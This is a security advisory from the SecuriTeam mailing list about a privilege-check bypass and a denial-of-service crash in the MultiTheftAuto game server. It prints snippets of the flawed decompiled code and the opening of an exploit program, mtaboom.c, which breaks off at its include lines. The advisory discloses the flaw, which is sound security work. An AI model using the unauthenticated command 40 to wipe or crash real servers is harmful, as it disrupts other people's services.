[NEWS] MultiTheftAuto Privileges Escalation and DoS Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

MultiTheftAuto Privileges Escalation and DoS Vulnerabilities
------------------------------------------------------------------------

SUMMARY

MultiTheftAuto (MTA) is a closed-source mod and server for the games
<http://www.rockstargames.com/grandtheftauto3/> Grand Theft Auto III and
<http://www.rockstargames.com/vicecity/pc/> Grand Theft Auto: Vice City
which adds multiplayer capabilities to them.

MultiTheftAuto does not check privileges for a command that allow to
overwrite information and cause a DoS by attackers.

DETAILS

Vulnerable Systems:
* MultiTheftAuto version 0.5 patch 1 and prior

Privileges Escalation:
The MTA server has the remote administration option enabled by default.
The problem is the existence of an undocumented command (number 40) which
allows the modification or the deletion of the content of the motd.txt
file used for the message of the day.
This is the only command which doesn't check if the client is an
administrator so anyone without permissions has access to it.

Denail of Service:
The command 40 is also the cause of another problem located in the same
function which seems incomplete or experimental as showed by the following
"retrieved" code:
// open file for writing "w"
length = *(u_int *)(src - (src % 4096));
for(i = j = 0; i < length; i++) {
if(src[i] == '\n') dst[j++] = '\r';
dst[j++] = src[i];
if(j < 1024) continue;
if(!WriteFile(...)) break;
j = 0;
}
// close file

length is -1 so the function starts an almost endless loop which stops
when the source buffer points to an unallocated zone of the memory. The
result is the immediate crash of the MTA server.

Seems that only the Windows server is affected by the crash because on
Linux the function is substituited with the following "still incorrect"
instruction which doesn't produce exceptions:
fd = fopen("motd.txt", "w");
fwrite(data + 4, 1, data, fd); // yes data is the buffer
fclose(fd);

Exploit:
winerr.h can be found at:
<http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html>
http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html

mtaboom.c:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

#define ONESEC 1